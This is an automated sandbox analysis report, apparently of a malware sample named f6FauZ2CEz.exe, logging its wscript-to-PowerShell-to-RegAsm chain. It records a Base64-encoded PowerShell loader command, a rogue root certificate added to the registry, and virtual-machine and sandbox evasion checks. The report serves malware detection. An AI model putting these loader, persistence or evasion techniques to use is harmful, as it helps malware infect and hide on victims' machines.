Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Google Chrome.lnk.6.dr | LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: f6FauZ2CEz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07D73A05 push FFFFFFE9h; iretd 5_2_07D73A07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0553C9C0 push es; ret 6_2_0553C9D0

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 1690000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 2F30000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 4F30000 memory reserve | memory write watch
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3274
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3922
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5745
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 593
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 1595
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748 | Thread sleep count: 3274 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156 | Thread sleep count: 174 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180 | Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232 | Thread sleep count: 3922 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep count: 5745 > 30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260 | Thread sleep time: -16602069666338586s >= -30000s
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256 | Thread sleep count: 39 > 30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660 | Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_00402910 FindFirstFileW
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exe | Code function: 0_2_004068B4 FindFirstFileW,FindClose
                          Source: powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: VMware
